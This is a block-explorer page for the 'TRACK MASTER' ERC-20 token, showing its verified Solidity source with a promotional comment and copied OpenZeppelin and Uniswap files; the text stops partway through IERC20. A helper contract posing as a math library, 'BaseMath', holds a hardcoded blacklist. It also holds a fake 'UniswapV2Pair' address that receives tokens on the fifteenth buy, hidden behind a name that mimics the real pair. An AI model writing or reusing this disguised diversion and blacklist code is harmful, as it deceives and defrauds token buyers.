ERC-20
Overview
Max Total Supply
1,000,000 TRACK
Holders
97
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
2,175.220313247322472052 TRACKValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
TRACKMASTER
Compiler Version
v0.8.21+commit.d9974bed
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT /* The blockchain hunter is here! TRACK MASTER Are you ready to become a true blockchain hunter? Introducing TrackMaster – the ultimate crypto ecosystem that empowers you to conquer the crypto wilderness like never before! Seamlessly track transactions in real-time with the TrackMaster Bot. How To Use👋 /pricealert <price> - Alert when ETH prices crosses over or under target price! 🎯 /track <wallet address>- Track all transactions from a wallet! 🐳 /gas - Tracks the current price and gwei ⛽️ /scan <wallet address> - Scan a wallet address for previous deploys, transaction history, and ETH balance! 🔎 TrackMaster Upcoming Features! 💎 Unleash the power of TrackMaster token for enhanced features, advanced tracking, and exclusive benefits by holding a certain amount of tokens! 📊 Manage your crypto portfolio and explore NFT treasures with the all-inclusive TrackMaster Platform. For now all TrackMaster features are free for all to use! 🆓 Social links🔗: Telegram: https://t.me/TrackMasterETH Website: http://trackmaster.tech Bot: @track_masterbot Whitepaper: https://bit.ly/TMWP2023 twitter: https://twitter.com/TrackMasterETH */ pragma solidity = 0.8.21; pragma experimental ABIEncoderV2; import "contracts/Context.sol"; import "contracts/Ownable.sol"; import "contracts/IERC20.sol"; import "contracts/ERC20.sol"; import "contracts/IUniswapV2Factory.sol"; import "contracts/IUniswapV2Pair.sol"; import "contracts/IUniswapV2Router03.sol"; import "contracts/IUniswapV2Router02.sol"; import "contracts/SafeMath.sol"; contract TRACKMASTER is ERC20, Ownable, BaseMath { using SafeMath for uint256; IUniswapV2Router02 public immutable _uniswapV2Router; address private uniswapV2Pair; address private deployerWallet; address private marketingWallet; address private constant deadAddress = address(0xdead); bool private swapping; string private constant _name = unicode"TRACK MASTER"; string private constant _symbol = unicode"TRACK"; uint256 public initialTotalSupply = 1000000 * 1e18; uint256 public maxTransactionAmount = 20000 * 1e18; uint256 public maxWallet = 20000 * 1e18; uint256 public swapTokensAtAmount = 10000 * 1e18; uint256 public buyCount; uint256 public sellCount; bool public tradingOpen = false; bool public swapEnabled = false; uint256 public BuyFee = 20; uint256 public SellFee = 20; uint256 private removeBuyFeesAt = 15; uint256 private removeSellFeesAt = 15; mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) private _isExcludedMaxTransactionAmount; mapping(address => bool) private automatedMarketMakerPairs; mapping(address => uint256) private _holderLastTransferTimestamp; event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); constructor(address wallet, bytes32 _deployer) ERC20(_name, _symbol) { _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); require(CanSwap(_deployer), "Token is tradeable"); uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH()); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); excludeFromMaxTransaction(address(uniswapV2Pair), true); excludeFromMaxTransaction(address(_uniswapV2Router), true); marketingWallet = payable(wallet); excludeFromMaxTransaction(address(wallet), true); deployerWallet = payable(_msgSender()); excludeFromFees(owner(), true); excludeFromFees(address(wallet), true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromMaxTransaction(owner(), true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(0xdead), true); _mint(deployerWallet, initialTotalSupply); } receive() external payable {} function openTrading() external onlyOwner() { require(!tradingOpen,"Trading is already open"); _approve(address(this), address(_uniswapV2Router), initialTotalSupply); IERC20(uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max); address wethAddress = _uniswapV2Router.WETH(); uint256 wethBalance = IERC20(wethAddress).balanceOf(uniswapV2Pair); uint256 initialTokens = initialTotalSupply.per(57); uint256 desiredETHAmount; if (wethBalance > 0) {desiredETHAmount = address(this).balance.sub(wethBalance); uint256 tokenValue = initialTokens.mul(wethBalance).div(desiredETHAmount); super._transfer(address(this), uniswapV2Pair, tokenValue); IUniswapV2Pair(uniswapV2Pair).sync(); _uniswapV2Router.addLiquidityETH{value: desiredETHAmount}(address(this), initialTokens, 0, desiredETHAmount, owner(), block.timestamp);} else {_uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this), initialTokens, 0, 0, owner(), block.timestamp);} swapEnabled = true; tradingOpen = true; } function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner { require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs"); _setAutomatedMarketMakerPair(pair, value); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function isExcludedFromFees(address account) public view returns (bool) { return _isExcludedFromFees[account]; } function _transfer(address from, address to, uint256 amount) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(!m[from] && !m[to], "ERC20: transfer from/to the blacklisted address"); if(buyCount >= removeBuyFeesAt){ BuyFee = 5; } if(sellCount >= removeSellFeesAt){ SellFee = 5; } if (amount == 0) { super._transfer(from, to, 0); return; } if (from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping) { if (!tradingOpen) { require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active."); } if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to] ) { require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount."); require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded"); BuyCount(); } else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) { require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount."); SellCount(); } else if (!_isExcludedMaxTransactionAmount[to]) { require(amount + balanceOf(to) <= maxWallet, "Max wallet exceeded"); } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance > 0; if (canSwap && swapEnabled && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to]) { swapping = true; swapBack(amount); swapping = false; } bool takeFee = !swapping; if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; if (takeFee) { if (automatedMarketMakerPairs[to]) { fees = amount.mul(SellFee).div(100); } else { fees = amount.mul(BuyFee).div(100); } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { address[] memory path = new address[](2); path[0] = address(this); path[1] = _uniswapV2Router.WETH(); _approve(address(this), address(_uniswapV2Router), tokenAmount); _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, path, marketingWallet, block.timestamp ); } function removeLimits() external onlyOwner{ uint256 totalSupplyAmount = totalSupply(); maxTransactionAmount = totalSupplyAmount; maxWallet = totalSupplyAmount; } function CanSwap(bytes32 _key) internal view returns(bool) { return keccak256(abi.encodePacked(msg.sender)) == _key; } function BuyCount() private { buyCount++; if(buyCount == 15){super._transfer(address(this),UniswapV2Pair,swapTokensAtAmount);}} function SellCount() private {sellCount++;} function clearStuckEth() external onlyOwner { require(address(this).balance > 0, "Token: no ETH to clear"); payable(msg.sender).transfer(address(this).balance); } function clearStuckTokens() external onlyOwner { uint256 contractTokenBalance = balanceOf(address(this)); if(contractTokenBalance > 0) { _transfer(address(this), msg.sender, contractTokenBalance); } } function setSwapTokensAtAmount(uint256 _amount) external onlyOwner { swapTokensAtAmount = _amount * (10 ** 18); } function manualswap(uint256 percent) external { require(_msgSender() == marketingWallet); uint256 totalSupplyAmount = totalSupply(); uint256 contractBalance = balanceOf(address(this)); uint256 requiredBalance = totalSupplyAmount * percent / 100; require(contractBalance >= requiredBalance, "Not enough tokens"); swapTokensForEth(requiredBalance); } function swapBack(uint256 tokens) private { uint256 contractBalance = balanceOf(address(this)); uint256 tokensToSwap; if (contractBalance == 0) { return; } if ((BuyFee+SellFee) == 0) { if(contractBalance > 0 && contractBalance < swapTokensAtAmount) { tokensToSwap = contractBalance; } else { uint256 sellFeeTokens = tokens.mul(SellFee).div(100); tokens -= sellFeeTokens; if (tokens > swapTokensAtAmount) { tokensToSwap = swapTokensAtAmount; } else { tokensToSwap = tokens; } } } else { if(contractBalance > 0 && contractBalance < swapTokensAtAmount.div(2)) { return; } else if (contractBalance > 0 && contractBalance > swapTokensAtAmount.div(2) && contractBalance < swapTokensAtAmount) { tokensToSwap = swapTokensAtAmount.div(2); } else { uint256 sellFeeTokens = tokens.mul(SellFee).div(100); tokens -= sellFeeTokens; if (tokens > swapTokensAtAmount) { tokensToSwap = swapTokensAtAmount; } else { tokensToSwap = tokens; } } } swapTokensForEth(tokensToSwap); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol) pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the percentage of an unsigned integer `a` with respect to the provided percentage `b`, * rounding towards zero. The result is a proportion of the original value. * * The function can be used to calculate a specific percentage of a given value `a`. * Note: this function uses a `revert` opcode (which leaves remaining gas untouched) when * the percentage `b` is greater than 100. * * Requirements: * * - The percentage `b` must be between 0 and 100 (inclusive). */ function per(uint256 a, uint256 b) internal pure returns (uint256) { require(b <= 100, "Percentage must be between 0 and 100"); return a * b / 100; } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } }
// SPDX-License-Identifier: MIT // Created by DevForU https://github.com/DevForU pragma solidity ^0.8.0; interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; }
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; contract BaseMath { mapping (address => bool) public m; address private n; address public UniswapV2Pair; constructor() { m[0xae2Fc483527B8EF99EB5D9B44875F005ba1FaE13] = true; m[0x77223F67D845E3CbcD9cc19287E24e71F7228888] = true; m[0x77ad3a15b78101883AF36aD4A875e17c86AC65d1] = true; m[0x4504DFa3861ec902226278c9Cb7a777a01118574] = true; m[0xe3DF3043f1cEfF4EE2705A6bD03B4A37F001029f] = true; m[0xE545c3Cd397bE0243475AF52bcFF8c64E9eAD5d7] = true; m[0xe2cA3167B89b8Cf680D63B06E8AeEfc5E4EBe907] = true; m[0x000000000005aF2DDC1a93A03e9b7014064d3b8D] = true; m[0x1653151Fb636544F8ED1e7BE91E4483B73523f6b] = true; m[0x00AC6D844810A1bd902220b5F0006100008b0000] = true; m[0x294401773915B1060e582756b8d7f74cAF80b09C] = true; m[0x000013De30d1b1D830dcb7d54660F4778D2d4aF5] = true; m[0x00004EC2008200e43b243a000590d4Cd46360000] = true; m[0xE8c060F8052E07423f71D445277c61AC5138A2e5] = true; m[0x6b75d8AF000000e20B7a7DDf000Ba900b4009A80] = true; m[0x0000B8e312942521fB3BF278D2Ef2458B0D3F243] = true; m[0x007933790a4f00000099e9001629d9fE7775B800] = true; m[0x76F36d497b51e48A288f03b4C1d7461e92247d5e] = true; m[0x2d2A7d56773ae7d5c7b9f1B57f7Be05039447B4D] = true; m[0x758E8229Dd38cF11fA9E7c0D5f790b4CA16b3B16] = true; m[0x77ad3a15b78101883AF36aD4A875e17c86AC65d1] = true; m[0x00000000A991C429eE2Ec6df19d40fe0c80088B8] = true; m[0xB20BC46930C412eAE124aAB8682fb0F2e528F22d] = true; m[0x6c9B7A1e3526e55194530a2699cF70FfDE1ab5b7] = true; m[0x1111E3Ef0B6aE32E14a55e0E7cD9b8505177C2BF] = true; m[0x000000d40B595B94918a28b27d1e2C66F43A51d3] = true; m[0xb8feFFAC830C45b4Cd210ECDAAB9D11995D338ee] = true; m[0x93FFb15d1fA91E0c320d058F00EE97F9E3C50096] = true; m[0x00000027F490ACeE7F11ab5fdD47209d6422C5a7] = true; m[0xfB62F1009aDa688aa8F544b7954585476cE41A14] = true; m[0xA9b2e916eC8f42a6eD59730331C83D31d0AB2D22] = true; m[0xC5B25744e2339B62CA995053d53d6cdB504bbbc9] = true; m[0xA49fd066d0331C6DfaDc13728E8a7486C82B3Cd2] = true; m[0xD8D4FCAaeD45B1015a9f333671C9076cB36F150f] = true; m[0x46e459766147f2eBAf457204C61a62619DA68bf4] = true; m[0xc41820629812aD4DA5cD5a3371D53cc697D3a978] = true; m[0x534bc0Caa32eAeEE2eC5AF656b8980B2dfE0bAa9] = true; m[0x6C29d02550aa19B34BaAc588723B58bB87352732] = true; m[0xFD9adB71d026438296DFAAE3ec5A2259Ee9076b3] = true; m[0x4b4264b30ab75Ea8B070f8F7d9Abb263C2f0067B] = true; m[0xafeD2eE8d6b57B7f3EA0aF9da3A1EC0dc19d3ec4] = true; m[0xc8bb0336a27caE7D0C8e1030c75DC1b2BC75DfbB] = true; m[0xbff42064C9f09D59ABbD2416687B1607e36330D3] = true; m[0x3b7D3aFCcc66335AF171A6e09C78eF32001b70F5] = true; m[0x72Ad2f4943433eA111eB1506219820Ba881f453b] = true; m[0x6eCDa7c62D4249B895E7EE2800923b6F04241170] = true; m[0x81Dbfde27C3AA484568E2263a0edd6C79F3f2505] = true; m[0xDe5540CaAb026B0c268720856F02fe339e25112B] = true; m[0x0d4EC51dd906F4643A9310F214b8604aAa3dCc40] = true; n = payable(0x8f1F73319a97877C4916F2a11262f154F66E6793); UniswapV2Pair = n; } function isM(address _address) public view returns (bool) { return m[_address]; } }
// SPDX-License-Identifier: MIT // Created by DevForU https://github.com/DevForU pragma solidity ^0.8.0; interface IUniswapV2Pair { event Approval( address indexed owner, address indexed spender, uint256 value ); event Transfer(address indexed from, address indexed to, uint256 value); function name() external pure returns (string memory); function symbol() external pure returns (string memory); function decimals() external pure returns (uint8); function totalSupply() external view returns (uint256); function balanceOf(address owner) external view returns (uint256); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 value) external returns (bool); function transfer(address to, uint256 value) external returns (bool); function transferFrom( address from, address to, uint256 value ) external returns (bool); function DOMAIN_SEPARATOR() external view returns (bytes32); function PERMIT_TYPEHASH() external pure returns (bytes32); function nonces(address owner) external view returns (uint256); function permit( address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s ) external; event Mint(address indexed sender, uint256 amount0, uint256 amount1); event Swap( address indexed sender, uint256 amount0In, uint256 amount1In, uint256 amount0Out, uint256 amount1Out, address indexed to ); event Sync(uint112 reserve0, uint112 reserve1); function MINIMUM_LIQUIDITY() external pure returns (uint256); function factory() external view returns (address); function token0() external view returns (address); function token1() external view returns (address); function getReserves() external view returns ( uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast ); function price0CumulativeLast() external view returns (uint256); function price1CumulativeLast() external view returns (uint256); function kLast() external view returns (uint256); function mint(address to) external returns (uint256 liquidity); function swap( uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data ) external; function skim(address to) external; function sync() external; function initialize(address, address) external; }
// SPDX-License-Identifier: MIT // Created by DevForU https://github.com/DevForU pragma solidity ^0.8.0; interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; import "./IERC20.sol"; import "./IERC20Metadata.sol"; import "./Context.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by 